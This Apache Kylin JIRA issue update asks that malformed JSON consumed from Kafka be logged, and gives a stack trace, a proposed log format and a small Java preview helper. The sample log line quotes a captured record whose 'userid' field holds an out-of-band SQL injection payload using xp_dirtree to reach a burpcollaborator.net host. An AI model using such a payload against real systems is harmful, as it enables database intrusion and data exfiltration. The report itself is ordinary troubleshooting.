[ https://issues.apache.org/jira/browse/KYLIN-3767?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Temple Zhou updated KYLIN-3767:
-------------------------------
Description:
Recently, a build of my cube on streaming data failed, so I checked the
syslog of the failed MR job.
However, the log contents did not help. They were as follows:
{code:java}
2019-01-11 15:12:48,774 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268
2019-01-11 15:12:48,776 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768
2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
 at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
    at org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
    at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
    at org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
    at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
    at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
    at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
    at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
    at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
    at java.security.AccessController.doPrivileged(Native Method)
    at javax.security.auth.Subject.doAs(Subject.java:422)
    at org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
    at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
{code}
The malformed JSON data should probably be printed in the syslog as well,
which would help with troubleshooting.
Something like this:
{code:java}
...
2019-01-11 15:12:48,778 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main] org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader: kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,785 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data: {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare @q varchar(99);set @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec master.dbo.xp_dirtree @q;-- "}
2019-01-11 15:12:48,787 ERROR [main] org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException: Unrecognized character escape 'h' (code 104)
 at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line: 1, column: 207]
    at org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
...
{code}
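One way the payload could be rendered for such a log line is sketched below. This is only an illustration under stated assumptions: the class `MalformedPayloadPreview`, its `preview` method, and the 1024-byte cap are hypothetical names and values, not taken from Kylin or from the attached patch. The sketch decodes a bounded prefix of the message bytes as UTF-8 and works on a duplicate of the buffer, so a parser that reads the same buffer afterwards would still see it from the original position.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;

// Hypothetical helper, not part of Kylin: renders a message payload for a log line.
final class MalformedPayloadPreview {
    private MalformedPayloadPreview() {}

    /**
     * Decodes at most maxBytes of the buffer's remaining bytes as UTF-8.
     * Reads from a duplicate, so the caller's position and limit are unchanged.
     * Cutting at a byte boundary can split a multi-byte character; the decoder
     * then substitutes U+FFFD for the partial sequence.
     */
    static String preview(ByteBuffer payload, int maxBytes) {
        if (maxBytes < 0) {
            throw new IllegalArgumentException("maxBytes must be >= 0");
        }
        ByteBuffer view = payload.duplicate();
        int total = view.remaining();
        int length = Math.min(total, maxBytes);
        byte[] bytes = new byte[length];
        view.get(bytes);
        String text = new String(bytes, StandardCharsets.UTF_8);
        // Mark truncation so the reader knows the log line is not the full record.
        return length < total ? text + "...(" + (total - length) + " more bytes)" : text;
    }

    public static void main(String[] args) {
        // A payload with the same kind of invalid escape (\h) as in the report.
        byte[] raw = "{\"userid\":\"a\\hsh\"}".getBytes(StandardCharsets.UTF_8);
        ByteBuffer payload = ByteBuffer.wrap(raw);
        System.err.println("malformed data: " + preview(payload, 1024));
    }
}
```

Capping the preview keeps one oversized record from flooding the task log. Since the payload may carry user-supplied content, as in the example above, whether to log it in full is a judgment call for the deployment.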
> Print the malformed JSON data consumed from Kafka Topic
> -------------------------------------------------------
>
> Key: KYLIN-3767
> URL: https://issues.apache.org/jira/browse/KYLIN-3767
> Project: Kylin
> Issue Type: Improvement
> Components: Job Engine
> Affects Versions: v2.2.0, v2.3.0, v2.4.0
> Reporter: Temple Zhou
> Assignee: Temple Zhou
> Priority: Major
> Attachments: KYLIN-3767.master.001.patch